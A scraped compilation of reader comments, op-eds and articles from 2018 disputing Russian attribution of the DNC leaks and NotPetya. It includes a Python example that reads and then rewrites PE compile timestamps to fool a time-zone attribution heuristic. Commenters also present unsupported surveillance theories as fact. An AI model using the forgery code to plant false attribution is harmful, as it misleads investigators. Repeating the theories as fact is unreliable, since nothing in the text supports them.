It makes complete sense that the oligarchy would do everything it could to harass and slow down the opposition, even if just to frustrate them to the point of giving up. I'm glad you are reporting your experiences here; it will help the site administrators deal with the problem.

A few years ago there was a Zionist mole(s) at Disqus who deleted posts that were too informative about Israel, especially those with links to highly informative articles. After an open discussion of the problem it eventually disappeared.

backwardsevolution , March 19, 2018 at 4:29 pm

Realist -- occasionally this happens to me and, yes, it is most frustrating. What I am doing more often now (but sometimes I still forget) is copying my text before hitting "Post Comment". If it disappears, at least you still have it and can try again. If this occurs, I go completely off the site, and then come back on and post again. Does this just happen on posts that took you a long time to get finished? I ask this because I've found that if I type some words, go away and start making dinner (or whatever), and my comment is not posted for several hours, then sometimes it does this.

I sure hope you get it figured out because your posts are always wonderful to read.

Realist , March 19, 2018 at 4:47 pm

This has been happening systematically to anything I post today. Both long and short entries. I copy the text, then post it. When I see it appear or even see it under moderation, I have assumed it would stand and so delete the copy rather than save it -- that space goes to the next composition. So, everything "disappeared" today is gone. Most of the stuff disappeared has to do with our supposed rights of free speech and the intrusion of the intelligence agencies into our lives and our liberties. Guess who I suspect of sabotaging these calls to be vigilant against attacks on our freedoms? Good gravy, they are becoming relentless in trying to control every jot and tittle of the narrative. The entire MSM is not enough for them, even web sites with a microscopic audience are now in their sights. I don't know what else to make of a problem that has become routine, not just sporadic.

backwardsevolution , March 19, 2018 at 6:18 pm

You're just too good, Realist! You make too much sense! If there is a "they" out there who are censoring, of course they'd go after someone like you. Take a break, kick back, then see what happens tomorrow. If it continues, then maybe you could make a few calls.

Skip Scott , March 19, 2018 at 7:29 pm

Sorry to hear of your difficulties, Realist. Don't give up yet. Your posts are a very valuable part of this website. I do suspect outside interference. This site and ICH are both under attack, and probably others as well. I hope Nat and Tom Feeley can afford some good techies to mount a good defense.

robjira , March 19, 2018 at 9:58 pm

I agree with be and Skip, Realist. The same thing happened to me (and I'm not even a frequent commentator here); sometimes it takes days for a post(s) to appear. This sometimes can be triggered by multiple links, extensive text formatting, etc. (you probably already know all this).

Anyway, be has it right; take a breather for a while. If something more nefarious is really happening, wear it like a medal; if your comments are disappeared, that as good as confirms you're on target. Your commentary is really insightful, and nothing freaks them out more than an informed opinion.
Peace.

Paul E. Merrell, J.D. , March 19, 2018 at 9:59 pm

To paraphrase someone: "Never attribute to malice that which can be attributed to a bug in the software."

backwardsevolution , March 19, 2018 at 10:15 pm

Paul E. Merrell -- "Never attribute to malice that which can be attributed to a bug in the software."

Quite true. I was having trouble going on Paul Craig Roberts' site for about a month (and another site, but I can't remember which one). I said to my son, "What the heck? Are they shutting down access to this site?" My son came onto my computer and within about two minutes he had me set right again. He said it had to do with my Internet security company. Who knew? Certainly not me! Thank goodness for tech-literate children.

Litchfield , March 20, 2018 at 9:09 am

" even web sites with a microscopic audience are now in their sights."

Maybe "microscopic," but with the potential to be magnified and multiplied. I have been puzzled as to why some posts have shown up as being in moderation and others not. But have not systematically followed up to see what happened. I assume comments at this site are moderated in some way, but why would that result in the patchy appearance of an actual "under moderation" signal?

freedom lover , March 20, 2018 at 3:39 pm

Not just this website but very common if you try to post anything on RT.

Sam F , March 19, 2018 at 8:47 pm

I also noticed several comments here that had been deleted after I refreshed the screen. They appeared to have attracted the "anti-semitism" accusation, so perhaps other hackers are involved.

Sam F , March 19, 2018 at 8:40 pm

While at first skeptical of the hacking hypothesis, I realized its similarity to what I have seen for two months on RT.

RT is apparently being copied to "mirror sites" likely controlled by US agencies, so that they can run spy scripts when the stories are viewed. My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

Most likely the secret agency scripts are sending files and browsing information to government spies.

It may be that CN is now being copied into hacked "mirror sites" by those who control the web DNS service that identifies the web server address for named websites. That would be a US secret agency. I have wondered whether such agencies are responsible for the trolls who have annoyed commenters here for several months. It may be that they are controlling the commentary now as well, to make political dossiers.

Litchfield , March 20, 2018 at 9:12 am

"My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. "

I have noticed this as well. I don't check RT all that often, but one time I wanted to see what Peter Lavelle had been up to lately with CrossTalk, so went to RT. This was awhile ago so I can't recall the exact details, but I think my browser generally froze up and I had to reboot my laptop. Of course it made me a bit paranoid and I wondered what was going on at RT.

Realist , March 20, 2018 at 5:01 pm

I've often noticed a great delay in RT loading. I'll have to focus on the effect you described. Sometimes I get a "service not available" notice for CN which usually resolves within no more than a half hour.

Inthebyte , March 20, 2018 at 11:27 am

I agree about RT. When I log on there everything slows to a crawl, or flat doesn't navigate. Thanks for the comment. Now I know I'm being gaslighted. Another site with all of these problems is Information Clearing House who are hacked repeatedly.

Zachary Smith , March 20, 2018 at 12:51 pm

My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

I'm running three script-blocker addons as I type this, and a fourth will be enabled again after making this post. The latter one does something to the CN site, and unless disabled any comment goes to the bottom of the page. My Firefox browser (which I'm using now) has the cache set to "0", and also to "never remember history". This slows it somewhat, but I figure the trade-off is worthwhile.

I review four "Russian" sites and have noticed they're chock-full of annoying ads and scripts. One of them I suspect is being run for income, for there is no coherent "message" along with most of the headlines being clickbait material. But I return there because sometimes they have a story worth more investigation.

Sam F , March 19, 2018 at 8:42 pm

While at first skeptical of the hacking hypothesis, I should note what I have seen for two months on RT.

RT is apparently being copied to "mirror sites" likely controlled by US agencies, so that they can run spy scripts when the stories are viewed. My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

Most likely the secret agency scripts are sending files and browsing information to government spies.

It may be that CN is now being copied into hacked "mirror sites" by those who control the web DNS service that identifies the web server address for named websites. That would be a US secret agency. I have wondered whether such agencies are responsible for the trolls who have annoyed commenters here for several months. It may be that they are controlling the commentary now as well, to make political dossiers.

geeyp , March 20, 2018 at 12:28 am

Nothing much secret regarding the secret agencies. Didn't I read that Google and Face. (same company with Y.T.) have fairly recently hired 10,000 new employees for just this purpose? I, too, have had plenty of issues with the RT.com site. It is not RT causing the issues. Truth hurts these evil P.O.S. And, also I have wondered regarding the ISP involvement. On the article topic, I was quite angered when I read his Tweet over the weekend; that punk has got nerve and needs to wear an orange jumpsuit.

Litchfield , March 20, 2018 at 9:13 am

What is the ISP movement?

Sam F , March 20, 2018 at 11:50 am

The ISP may or may not be involved, but the DNS is involved in creating fake (or real) "mirror sites." DNS (distributed name service) has its own servers all over, which translate text URLs (xxx.com) to numeric internet (IP) addresses. So when you request the site, your local DNS server gives you the address based upon its updates from other sources, including the "mirror" sites used for heavily-used websites.

I do not yet know the processes used to update DNS servers which would be tampered to create fake mirror sites, or exactly how this would be controlled, except that secret agencies would know this and would have such control. Others might be able to do this as well.

Skeptigal , March 20, 2018 at 4:26 am

Sorry, I know you're frustrated but I couldn't help but giggle at your indignant replies. They are hilarious. Your comments may have ended up in the spam folder. If you contact them they will restore your comments. Good luck! :)

Realist , March 20, 2018 at 11:23 pm

Using the British standard, I'm going to assume you are responsible for all the trouble unless you prove otherwise.

[Mar 15, 2018] Julian Assange The CIA director is waging war on truth-tellers like WikiLeaks

Notable quotes:
"... All this speech to stifle speech comes in reaction to the first publication in the start of WikiLeaks' "Vault 7" series. Vault 7 has begun publishing evidence of remarkable CIA incompetence and other shortcomings. This includes the agency's creation, at a cost of billions of taxpayer dollars, of an entire arsenal of cyber viruses and hacking programs -- over which it promptly lost control and then tried to cover up the loss. These publications also revealed the CIA's efforts to infect the public's ubiquitous consumer products and automobiles with computer viruses. ..."
"... President Theodore Roosevelt understood the danger of giving in to those "foolish or traitorous persons who endeavor to make it a crime to tell the truth about the Administration when the Administration is guilty of incompetence or other shortcomings." Such "endeavor is itself a crime against the nation," Roosevelt wrote. President Trump and his officials should heed that advice ..."
Mar 15, 2018 | www.washingtonpost.com

Julian Assange is editor of WikiLeaks.

Mike Pompeo, in his first speech as director of the CIA, chose to declare war on free speech rather than on the United States' actual adversaries. He went after WikiLeaks, where I serve as editor, as a "non-state hostile intelligence service." In Pompeo's worldview, telling the truth about the administration can be a crime -- as Attorney General Jeff Sessions quickly underscored when he described my arrest as a "priority." News organizations reported that federal prosecutors are weighing whether to bring charges against members of WikiLeaks, possibly including conspiracy, theft of government property and violating the Espionage Act.

All this speech to stifle speech comes in reaction to the first publication in the start of WikiLeaks' "Vault 7" series. Vault 7 has begun publishing evidence of remarkable CIA incompetence and other shortcomings. This includes the agency's creation, at a cost of billions of taxpayer dollars, of an entire arsenal of cyber viruses and hacking programs -- over which it promptly lost control and then tried to cover up the loss. These publications also revealed the CIA's efforts to infect the public's ubiquitous consumer products and automobiles with computer viruses.

When the director of the CIA, an unelected public servant, publicly demonizes a publisher such as WikiLeaks as a "fraud," "coward" and "enemy," it puts all journalists on notice, or should. Pompeo's next talking point, unsupported by fact, that WikiLeaks is a "non-state hostile intelligence service," is a dagger aimed at Americans' constitutional right to receive honest information about their government. This accusation mirrors attempts throughout history by bureaucrats seeking, and failing, to criminalize speech that reveals their own failings.

President Theodore Roosevelt understood the danger of giving in to those "foolish or traitorous persons who endeavor to make it a crime to tell the truth about the Administration when the Administration is guilty of incompetence or other shortcomings." Such "endeavor is itself a crime against the nation," Roosevelt wrote. President Trump and his officials should heed that advice.

[Mar 08, 2018] A key piece of evidence pointing to 'Guccifer 2.0' being a fake personality created by the conspirators in their attempt to disguise the fact that the materials from the DNC published by 'WikiLeaks' were obtained by a leak rather than a hack had to do with the involvement of the former GCHQ person Matt Tait.

Highly recommended!
Notable quotes:
"... What has however become clear in recent days is that the 'Gerasimov Doctrine' was not invented by its supposed author, but by a British academic, Mark Galeotti, who has now confessed – although in a way clearly designed to maintain as much of the 'narrative' as possible. ..."
"... Three days ago, an article by Galleoti appeared in 'Foreign Policy' entitled 'I'm Sorry for Creating the "Gerasimov Doctrine": I was the first to write about Russia's infamous high-tech military strategy. One small problem: it doesn't exist.' ..."
"... The translation of the original article by Gerasimov with annotations by Galeotti which provoked the whole hysteria turns out to be a classic example of what I am inclined to term 'bad Straussianism.' ..."
"... What Strauss would have called the 'exoteric' meaning of the article quite clearly has to do with defensive strategies aimed at combatting the kind of Western 'régime change' projects about which people like those who write for 'Lawfare' are so enthusiastic. But Galeotti tells us that this is, at least partially, a cover for an 'esoteric' meaning, which has to do with offensive actions in Ukraine and similar places. ..."
Mar 08, 2018 | turcopolier.typepad.com

David Habakkuk , 08 March 2018 at 10:28 AM

PT and all,

More material on the British end of the conspiracy.

Commenting on an earlier piece by PT, I suggested that a key piece of evidence pointing to 'Guccifer 2.0' being a fake personality created by the conspirators in their attempt to disguise the fact that the materials from the DNC published by 'WikiLeaks' were obtained by a leak rather than a hack had to do with the involvement of the former GCHQ person Matt Tait.

(See http://turcopolier.typepad.com/sic_semper_tyrannis/2018/02/pieces-of-the-coup-puzzle-fall-into-place-by-publius-tacitus.html .)

To recapitulate: Back in June 2016, hard on the heels of the claim by Dmitri Alperovitch of 'CrowdStrike' to have identified clinching evidence making the GRU prime suspects, Tait announced that, although initially unconvinced, he had found a 'smoking gun' in the 'metadata' of the documents released by 'Guccifer 2.0.'

A key part of this was the use by someone modifying a document of 'Felix Edmundovich' – the name and patronymic of Dzerzhinsky, the Lithuanian-Polish noble who created the Soviet secret police.

As I noted, Tait was generally identified as a former GCHQ employee who now ran a consultancy called 'Capital Alpha Security.' However, checking Companies House records revealed that he had filed 'dormant accounts' for the company. So it looks as though the company was simply a 'front', designed to fool 'useful idiots' into believing he was an objective analyst.

As I also noted in those comments, Tait writes the 'Lawfare' blog, one of whose founders, Benjamin Wittes, looks as though he may himself have been involved in the conspiracy up to the hilt. Furthermore, a secure income now appears to have been provided to replace that from the non-existent consultancy, in the shape of a position at the 'Robert S. Strauss Center for International Security and Law', run by Robert Chesney, a co-founder with Wittes of 'Lawfare.'

A crucial part of the story, however, is that the notion of GRU responsibility for the supposed 'hacks' appears to be part of a wider 'narrative' about the supposed 'Gerasimov Doctrine.' From the 'View from Langley' provided to Bret Stephens by CIA Director Mike Pompeo at the 'Aspen Security Forum' last July:

'I hearken back to something called the Gerasimov doctrine from the early 70s, he's now the head of the – I'm a Cold War guy, forgive me if I mention Soviet Union. He's now the head of the Russian army and his idea was that you can win wars without firing a single shot or with firing very few shots in ways that are decidedly not militaristic, and that's what's happened. What changes is the costs; to effectuate change through cyber and through RT and Sputnik, their news outlets, and through other soft means; has just really been lowered, right. It used to be it was expensive to run an ad on a television station now you simply go online and propagate your message. And so they have they have found an effective tool, an easy way to go reach into our systems, and into our culture to achieve the outcomes they are looking for.'

(See https://aspensecurityforum.org/wp-content/uploads/2017/07/The-View-from-Langley.pdf .)

What has however become clear in recent days is that the 'Gerasimov Doctrine' was not invented by its supposed author, but by a British academic, Mark Galeotti, who has now confessed – although in a way clearly designed to maintain as much of the 'narrative' as possible.

Three days ago, an article by Galeotti appeared in 'Foreign Policy' entitled 'I'm Sorry for Creating the "Gerasimov Doctrine": I was the first to write about Russia's infamous high-tech military strategy. One small problem: it doesn't exist.'

(See http://foreignpolicy.com/2018/03/05/im-sorry-for-creating-the-gerasimov-doctrine/ .)

A key paragraph:

'Gerasimov was actually talking about how the Kremlin understands what happened in the "Arab Spring" uprisings, the "color revolutions" against pro-Moscow regimes in Russia's neighborhood, and in due course Ukraine's "Maidan" revolt. The Russians honestly – however wrongly – believe that these were not genuine protests against brutal and corrupt governments, but regime changes orchestrated in Washington, or rather, Langley. This wasn't a "doctrine" as the Russians understand it, for future adventures abroad: Gerasimov was trying to work out how to fight, not promote, such uprisings at home.'

The translation of the original article by Gerasimov with annotations by Galeotti which provoked the whole hysteria turns out to be a classic example of what I am inclined to term 'bad Straussianism.'

(See https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/ .)

What Strauss would have called the 'exoteric' meaning of the article quite clearly has to do with defensive strategies aimed at combatting the kind of Western 'régime change' projects about which people like those who write for 'Lawfare' are so enthusiastic. But Galeotti tells us that this is, at least partially, a cover for an 'esoteric' meaning, which has to do with offensive actions in Ukraine and similar places.

Having now read the text of the article, I can see a peculiar irony in it. In a section entitled 'You Can't Generate Ideas On Command', Gerasimov suggests that 'The state of Russian military science today cannot be compared with the flowering of military-theoretical thought in our country on the eve of World War II.'

According to the 'exoteric' meaning of the article, it is not possible to blame anyone in particular for this situation. But Gerasimov goes on to remark that, while at the time of that flowering there were 'no people with higher degrees' or 'academic schools or departments', there were 'extraordinary personalities with brilliant ideas', who he terms 'fanatics in the best sense of the word.'

Again, Galeotti discounts the suggestion that nobody is to blame, assuming an 'esoteric meaning', and remarking: 'Ouch. Who is he slapping here?'

Actually, Gerasimov refers by name to two, utterly different figures, who certainly were 'extraordinary personalities with brilliant ideas.'

If Pompeo had even the highly amateurish grasp of the history of debates among Soviet military theorists that I have managed to acquire he would be aware that one of the things which was actually happening in the 'Seventies was the rediscovery of the ideas of Alexander Svechin.

Confirming my sense that this has continued on, Gerasimov ends by using Svechin to point up an intractable problem: it can be extraordinarily difficult to anticipate the conditions of a war, and crucial not to impose a standardised template likely to be inappropriate, but one has to make some kinds of prediction in order to plan.

Immediately after the passage which Galeotti interprets as a dig at some colleague, Gerasimov elaborates his reference to 'extraordinary people with brilliant ideas' by referring to an anticipation of a future war, which proved prescient, from a very different figure to Svechin:

'People like, for instance, Georgy Isserson, who, despite the views he formed in the prewar years, published the book "New Forms Of Combat." In it, this Soviet military theoretician predicted: "War in general is not declared. It simply begins with already developed military forces. Mobilization and concentration is not part of the period after the onset of the state of war as was the case in 1914 but rather, unnoticed, proceeds long before that." The fate of this "prophet of the Fatherland" unfolded tragically. Our country paid in great quantities of blood for not listening to the conclusions of this professor of the General Staff Academy.'

Unlike Svechin, whom I have read, Isserson was unfamiliar to me. A quick Google search, however, unearthed a mass of material in American sources – including, by good fortune, an online text of a 2010 study by Dr Richard Harrison entitled 'Architect of Soviet Victory in World War II: The Life and Theories of G.S. Isserson', and a presentation summarising the volume.

Ironically, Svechin and Isserson were on opposite sides of fundamental divides. So the former, an ethnic Russian from Odessa, was one of the 'genstabisty', the former Tsarist General Staff officers who sided with the Bolsheviks and played a critical role in teaching the Red Army how to fight. Meanwhile Isserson was a very different product of the 'borderlands' – the son of a Jewish doctor, brought up in Kaunas, with a German Jewish mother from what was then Königsberg, giving him an easy facility with German-language sources.

The originator of the crucial concept of 'operational' art – the notion that in modern industrial war, the ability to handle a level intermediate between strategy and tactics was critical to success – was actually Svechin.

Developing the ambivalence of Clausewitz, however, he stressed that both the offensive and the defensive had their places, and that the key to success was to know which was appropriate when and also to be able rapidly to change from one to the other. His genuflections to Marxist-Leninist dogma, moreover, were not such as to take in any of Dzerzhinsky's people.

By contrast, Isserson was unambiguously committed to the offensive strand in the Clausewitzian tradition, and a Bolshevik 'true believer' (although he married the daughter of a dispossessed ethnically Russian merchant, who had their daughter baptised without his knowledge.)

As Harrison brings out, Isserson's working through of the problems of offensive 'operational art' would be critical to the eventual success of the Red Army against Hitler. However, the specific text to which he refers was, ironically, a warning of precisely one of the problems implicit in the single-minded reliance on the offensive: the possibility that one could be left with no good options confronting an antagonist similarly oriented – as turned out to be the case.

As Gerasimov intimates, while unlike Svechin, executed in 1938, Isserson survived the Stalin years, he was another of the victims of Dzerzhinsky's heirs. Arrested shortly before his warnings were vindicated by the German attack on 22 June 1941, he would spend the war in the Gulag and only return to normal life after Stalin's death.

So I think that the actual text of Gerasimov's article reinforces a point I have made previously. The 'evidence' identified by Tait is indeed a 'smoking gun.' But it emphatically does not point towards the GRU.

Meanwhile, another moral of the tale is that Americans really should stop being taken in by charlatan Brits like Galeotti, Tait, and Steele.

[Mar 07, 2018] By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware.

Mar 07, 2018 | www.thegatewaypundit.com

Paul Tibbets a day ago

Brennan is a scumbag; he oversaw the CIA as they sought to become the premier Gov. agency.

https://wikileaks.org/ciav7p1/

Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force -- its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities.

By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified.

[Feb 20, 2018] US-UK Accuse Russia of "NotPetya" Cyberattack, Offer Zero Evidence Global Research - Centre for Research on Globalization

Notable quotes:
"... The US and European press have both published stories accusing the Russian government, and in particular, the Russian military, of the so-called "NotPetya" cyberattack which targeted information technology infrastructure in Ukraine. ..."
"... Ulson Gunnar is a New York-based geopolitical analyst and writer especially for the online magazine " New Eastern Outlook ". ..."
"... All images in this article are from the author. ..."
Feb 20, 2018 | www.globalresearch.ca

US-UK Accuse Russia of "NotPetya" Cyberattack, Offer Zero Evidence
By Ulson Gunnar, Global Research, February 19, 2018. Region: Europe, Russia and FSU, USA. Theme: Intelligence, Media Disinformation

The US and European press have both published stories accusing the Russian government, and in particular, the Russian military, of the so-called "NotPetya" cyberattack which targeted information technology infrastructure in Ukraine.

The Washington Post, in an article titled "UK blames Russian military for 'malicious' cyberattack," would report:

Britain and the United States blamed the Russian government on Thursday for a cyberattack that hit businesses across Europe last year, with London accusing Moscow of "weaponizing information" in a new kind of warfare. Foreign Minister Tariq Ahmad said "the U.K. government judges that the Russian government, specifically the Russian military, was responsible for the destructive NotPetya cyberattack of June 2017." The fast-spreading outbreak of data-scrambling software centered on Ukraine, which is embroiled in a conflict with Moscow-backed separatists in the country's east. It spread to companies that do business with Ukraine, including U.S. pharmaceutical company Merck, Danish shipping firm A.P. Moller-Maersk and FedEx subsidiary TNT.

British state media, the BBC, would report in its article "UK and US blame Russia for 'malicious' NotPetya cyber-attack" that:

The Russian military was directly behind a "malicious" cyber-attack on Ukraine that spread globally last year, the US and Britain have said.

The BBC also added that:

On Thursday the UK government took the unusual step of publicly accusing the Russia military of being behind the attack. "The UK and its allies will not tolerate malicious cyber activity," the foreign office said in a statement. Later, the White House also pointed the finger at Russia.

Yet despite this "unusual step of publicly accusing the Russian military of being behind the attack," neither the US nor the British media provided the public with any evidence, at all, justifying the accusations. The official statement released by the British government would claim:

The UK's National Cyber Security Centre assesses that the Russian military was almost certainly responsible for the destructive NotPetya cyber-attack of June 2017. Given the high confidence assessment and the broader context, the UK government has made the judgement that the Russian government – the Kremlin – was responsible for this cyber-attack.

Claiming that the Russian military was "almost certainly responsible," is not the same as being certain the Russian military was responsible. And such phrases as "almost certainly" have been used in the past by the United States and its allies to launch baseless accusations ahead of what would otherwise be entirely unprovoked aggression against targeted states, in this case, Russia. The White House would also release a statement claiming:

In June 2017, the Russian military launched the most destructive and costly cyber-attack in history. The attack, dubbed "NotPetya," quickly spread worldwide, causing billions of dollars in damage across Europe, Asia, and the Americas. It was part of the Kremlin's ongoing effort to destabilize Ukraine and demonstrates ever more clearly Russia's involvement in the ongoing conflict. This was also a reckless and indiscriminate cyber-attack that will be met with international consequences.

Considering claims that this is the "most destructive and costly cyber-attack in history," it would seem imperative to establish evidence beyond doubt of who was responsible.

No Evidence From Governments Confirmed to Possess the Means to Fabricate Attribution

Yet, so far, this has not been done. Claims that Russia's military was behind the attacks seem to be built solely upon private analysts who have suggested the attacks appear to have originated in Russia.

However, as it was revealed by Wikileaks in its Vault 7 release, exposing cyber hacking tools used by the US Central Intelligence Agency (CIA), the origin of attacks can be forged. USA Today, in an article titled "WikiLeaks: CIA hacking group 'UMBRAGE' stockpiled techniques from other hackers," would admit:

A division of the Central Intelligence Agency stockpiled hacking techniques culled from other hackers, giving the agency the ability to leave behind the "fingerprints" of the outside hackers when it broke into electronic devices, the anti-secrecy group WikiLeaks alleges as it released thousands of documents Tuesday.

The article continues by pointing out:

The documents also suggest that one of the agency's divisions – the Remote Development Branch's UMBRAGE Group – may have been cataloguing hacking methods from outside hackers, including in Russia, that would have allowed the agency to mask their identity by employing the method during espionage. "With UMBRAGE and related projects the CIA cannot only increase its total number of attack types, but also misdirect attribution by leaving behind the 'fingerprints' of the groups that the attack techniques were stolen from," Wikileaks said in a statement.

Not only does this ability allow the CIA to carry out espionage that if discovered would be attributed to other parties, it also allows the CIA to conduct attacks the US government and its allies can then blame on foreign states for the purpose of politically maligning them, and even justifying otherwise indefensible acts of aggression, either militarily, or in the realm of cyberspace.

Evidence provided by the UK and US governments would have to establish Russia's role in the "NotPetya" cyberattack beyond mere attribution, since this is now confirmed to be possible to forge. The UK and US governments have failed to provide any evidence at all, likely because all they can offer is mere attribution, which skeptics could easily point out might have been forged.

NATO Had Been Preparing "Offensive" Cyber Weapons

As previously reported, NATO had been in the process of creating and preparing to deploy what it called an "offensive defense" regarding cyber warfare. Reuters, in an article titled "NATO mulls 'offensive defense' with cyber warfare rules," would state:

A group of NATO allies are considering a more muscular response to state-sponsored computer hackers that could involve using cyber attacks to bring down enemy networks, officials said.

Reuters would also report:

The doctrine could shift NATO's approach from being defensive to confronting hackers that officials say Russia, China and North Korea use to try to undermine Western governments and steal technology.

It has been repeatedly pointed out how the US, UK and other NATO members have repeatedly used false pretexts to justify military aggression carried out with conventional military power. Examples include fabricated evidence of supposed "weapons of mass destruction (WMD)" preceding the 2003 US invasion of Iraq and the so-called "humanitarian war" launched against Libya in 2011 built on fabricated accounts from US and European rights advocates.

With UMBRAGE, the US and its allies now possess the ability to fabricate evidence in cyberspace, enabling them to accuse targeted nations of cyber attacks they never carried out, to justify the deployment of "offensive" cyber weapons NATO admits it has prepared ahead of time. While the US and European media have warned the world of a "cyber-911" it appears instead we are faced with "cyber-WMD claims" rolled out to justify a likewise "cyber-Iraq War" using cyber weapons the US and its NATO allies have been preparing and seeking to use for years. Were Russia to really be behind the "NotPetya" cyberattack, the US and its allies have only themselves to blame for decades spent undermining their own credibility with serial instances of fabricating evidence to justify their serial military aggression. Establishing that Russia was behind the "NotPetya" cyberattack, however, will require more evidence than mere "attribution" the CIA can easily forge.

*

Ulson Gunnar is a New York-based geopolitical analyst and writer especially for the online magazine " New Eastern Outlook ".

All images in this article are from the author.

[Feb 19, 2018] The White House on Thursday blamed Russia for the devastating 'NotPetya' cyber attack last year , joining the British government in condemning Moscow for unleashing a virus

Notable quotes:
"... Poor Russia can't get a break, neither can Americans get a break from this USA 'get Russia' monkey circus. The monkeys now reach back a year ago to get Russia on a cyber attack. ..."
Feb 19, 2018 | www.unz.com

renfro, February 19, 2018 at 7:38 am GMT

Poor Russia can't get a break, neither can Americans get a break from this USA 'get Russia' monkey circus. The monkeys now reach back a year ago to get Russia on a cyber attack.

White House blames Russia for 'reckless' NotPetya cyber attack

https://www.reuters.com/russia/white-house-blames-russia-for-reckless-notpetya-c…

3 days ago -- WASHINGTON/LONDON (Reuters) -- The White House on Thursday blamed Russia for the devastating 'NotPetya' cyber attack last year , joining the British government in condemning Moscow for unleashing a virus that crippled parts of Ukraine's infrastructure and damaged computers in countries across the

Best advice for Americans believe nothing, trust nothing that issues from a government.

The experts:

John McAfee, founder of an anti-virus firm, said: "When the FBI or when any other agency says the Russians did it or the Chinese did something or the Iranians did something -- that's a fallacy," said McAfee.

"Any hacker capable of breaking into something is extraordinarily capable of hiding their tracks. If I were the Chinese and I wanted to make it look like the Russians did it I would use Russian language within the code. I would use Russian techniques of breaking into organisations so there is simply no way to assign a source for any attack -- this is a fallacy.

"I can promise you -- if it looks like the Russians did it, then I can guarantee you it was not the Russians."

Wikileaks has released a number of CIA cyber tools it had obtained. These included software specifically designed to create false attributions.
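Both the Gunnar article above and McAfee's remarks rest on one technical point: the artifacts analysts read as "fingerprints" (language strings, reused tooling, build timestamps) are written by whoever built the malware and can be set to anything. The block below is an added example, not code from either source and not anything taken from the Vault 7 material. It builds a constructed, minimal PE header, reads the COFF TimeDateStamp the way a triage tool would, applies the common "working-hours" heuristic that turns a set of build timestamps into a guessed time zone, and then rewrites the stamps so that the same heuristic points somewhere else. The header layout, the 09:00-18:00 working window and the sample timestamps are assumptions made for the demo.

```python
import struct
from datetime import datetime, timedelta, timezone


def build_minimal_pe(compiled_at: datetime) -> bytes:
    """Constructed sample: the smallest byte layout that lets a parser find the
    COFF header (DOS stub with e_lfanew, 'PE\\0\\0', IMAGE_FILE_HEADER).
    It is not a runnable executable; only the TimeDateStamp field matters here."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, int(compiled_at.timestamp()),
                       0, 0, 0, 0x0022)
    return bytes(dos) + b"PE\0\0" + coff


def _timestamp_offset(blob: bytes) -> int:
    """Offset of the 4-byte TimeDateStamp inside a PE image."""
    if blob[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    return e_lfanew + 4 + 4   # skip the signature, Machine and NumberOfSections


def read_compile_time(blob: bytes) -> datetime:
    """The 'compile time' a triage tool reports: a plain uint32 of UTC seconds."""
    ts = struct.unpack_from("<I", blob, _timestamp_offset(blob))[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def shift_compile_time(blob: bytes, hours: int) -> bytes:
    """Rewrite the TimeDateStamp in place. Nothing verifies this field, so the
    author of a binary can set it to anything at link time or afterwards."""
    out = bytearray(blob)
    new = read_compile_time(blob) + timedelta(hours=hours)
    struct.pack_into("<I", out, _timestamp_offset(blob), int(new.timestamp()))
    return bytes(out)


def infer_utc_offset(compile_times) -> int:
    """A common analyst heuristic (assumption for the demo): the developer builds
    during a 09:00-18:00 working day, so pick the UTC offset under which the
    most builds fall inside that window."""
    def hits(off):
        return sum(1 for t in compile_times if 9 <= (t.hour + off) % 24 < 18)
    return max(range(-12, 15), key=hits)


def constructed_samples():
    """Nine constructed binaries 'built' between 06:30 and 14:30 UTC on one day."""
    day = datetime(2018, 2, 19, tzinfo=timezone.utc)
    return [build_minimal_pe(day + timedelta(hours=h, minutes=30))
            for h in range(6, 15)]


if __name__ == "__main__":
    samples = constructed_samples()
    print("inferred offset:", infer_utc_offset([read_compile_time(b) for b in samples]))
    forged = [shift_compile_time(b, 10) for b in samples]
    print("after rewriting:", infer_utc_offset([read_compile_time(b) for b in forged]))
```

Run stand-alone, it infers UTC+3 for the constructed samples and UTC-7 once the stamps have been shifted by ten hours. The point for an investigator is that a timestamp, a Cyrillic string or a reused exploit is evidence of what was placed in the binary, not of who placed it; such artifacts carry weight only in combination with evidence the attacker did not control.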

[Feb 19, 2018] Kim Dotcom: Let Me Assure You, The DNC Hack Wasn't Even A Hack Zero Hedge

Notable quotes:
"... All fucking Kabuki. All of it. ..."
"... The Deep State (Oligarchs and the MIC) is totally fucking loving this: they have Trump and the GOP giving them everything they ever wanted and they have the optics and distraction of an "embattled" president that claims to be against or a victim of the "deep state" and a base that rallies, circles the wagons around him, and falls for the narrative. ..."
